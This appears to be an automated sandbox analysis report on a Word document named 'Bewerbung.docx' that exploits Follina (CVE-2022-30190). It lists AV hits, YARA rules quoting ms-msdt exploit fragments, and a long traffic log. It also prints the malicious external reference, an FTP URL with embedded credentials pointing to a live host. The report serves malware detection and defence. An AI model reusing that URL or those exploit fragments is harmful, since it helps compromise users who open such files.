Windows Analysis Report
Bewerbung.docx

Overview

General Information

Sample Name: Bewerbung.docx
Analysis ID: 705530
MD5: e7521cc41970a93d81eb7db063563474
SHA1: 668afe1cf1ff3a6b8b9f9b0ceaa81549944bffc2
SHA256: d28398402e0b64cfb6e1f8e28cc21584eddd159690c2dab80aafae9c79201ae0

Detection

CVE-2021-40444, Follina CVE-2022-30190
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Detected CVE-2021-40444 exploit
Antivirus detection for dropped file
Contains an external reference to another file
Connects to many ports of the same IP (likely port scanning)
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Detected TCP or UDP traffic on non-standard ports
Internet Provider seen in connection with other malware
Uses FTP

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2212 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup
No configs have been found
Source: document.xml.rels
Rule: SUSP_Doc_WordXMLRels_May22
Description: Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation
Author: Tobias Michalski, Christian Burkard, Wojciech Cieslak
Strings:
  • 0x39:$a1: <Relationships
  • 0x44f:$a2: TargetMode="External"
  • 0x3ec:$x1: .html!
Source: dump.pcap
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x299f:$a: PCWDiagnostic
  • 0x5c03:$a: PCWDiagnostic
  • 0x8dd0:$a: PCWDiagnostic
  • 0xb2fa:$a: PCWDiagnostic
  • 0x2993:$sa3: ms-msdt
  • 0x5bf7:$sa3: ms-msdt
  • 0x8dc4:$sa3: ms-msdt
  • 0xb2ee:$sa3: ms-msdt
  • 0x29f3:$sb3: IT_BrowseForFile=
  • 0x5c57:$sb3: IT_BrowseForFile=
  • 0x8e24:$sb3: IT_BrowseForFile=
  • 0xb34e:$sb3: IT_BrowseForFile=

Source: dump.pcap
Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22
Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation
Author: Tobias Michalski, Christian Burkard
Strings:
  • 0x2982:$re1: location.href = "ms-msdt:
  • 0x5be6:$re1: location.href = "ms-msdt:
  • 0x8db3:$re1: location.href = "ms-msdt:
  • 0xb2dd:$re1: location.href = "ms-msdt:

Source: dump.pcap
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x179c:$a: PCWDiagnostic
  • 0x1790:$sa3: ms-msdt
  • 0x17f0:$sb3: IT_BrowseForFile=

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html
Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22
Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation
Author: Tobias Michalski, Christian Burkard
Strings:
  • 0x177f:$re1: location.href = "ms-msdt:

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x179c:$a: PCWDiagnostic
  • 0x1790:$sa3: ms-msdt
  • 0x17f0:$sb3: IT_BrowseForFile=

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html
Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22
Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation
Author: Tobias Michalski, Christian Burkard
Strings:
  • 0x177f:$re1: location.href = "ms-msdt:
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: Bewerbung.docx | Avira: detected
Source: Bewerbung.docx | ReversingLabs: Detection: 20%
Source: Bewerbung.docx | Virustotal: Detection: 9%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html | Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html | Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html | Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html | Avira: detection malicious, Label: JS/CVE-2022-30190.G

Exploits

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html, type: DROPPED
Source: document.xml.rels | Extracted files from sample: mhtml:ftp://epiz_32622638:9ptise0wwbczj@185.27.134.11/wwwwwwwwwwwwwwwwwwww/smartscreen.html!x-usc:ftp://epiz_32622638:9ptise0wwbczj@185.27.134.11/wwwwwwwwwwwwwwwwwwww/smartscreen.html
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic | TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic | TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic | TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic | TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic | TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic | TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic | TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic | TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic | TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic | TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic | TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic | TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic | TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic | TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic | TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic | TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic | TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic | TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic | TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic | TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic | TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic | TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic | TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic | TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic | TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
Source: global traffic | TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic | TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic | TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic | TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic | TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic | TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic | TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
Source: global traffic | TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
Source: global traffic | TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
Source: global traffic | TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
Source: global traffic | TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic | TCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic | TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic | TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic | TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic | TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic | TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic | TCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
Source: global traffic | TCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
Source: global traffic | TCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
Source: global traffic | TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21

Networking

Source: global traffic | TCP traffic: 185.27.134.11 ports 21699,39352,1,2,50652,47790,21
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: Joe Sandbox View | ASN Name: WILDCARD-ASWildcardUKLimitedGB WILDCARD-ASWildcardUKLimitedGB
Source: unknown | FTP traffic detected: 185.27.134.11:21 -> 192.168.2.22:49173 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 434 of 6900 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 434 of 6900 allowed.220-Local time is now 09:04. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 434 of 6900 allowed.220-Local time is now 09:04. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 434 of 6900 allowed.220-Local time is now 09:04. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 60 seconds of inactivity.
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown | TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{22F15F1C-2D40-4586-81FC-738423AAB483}.tmp
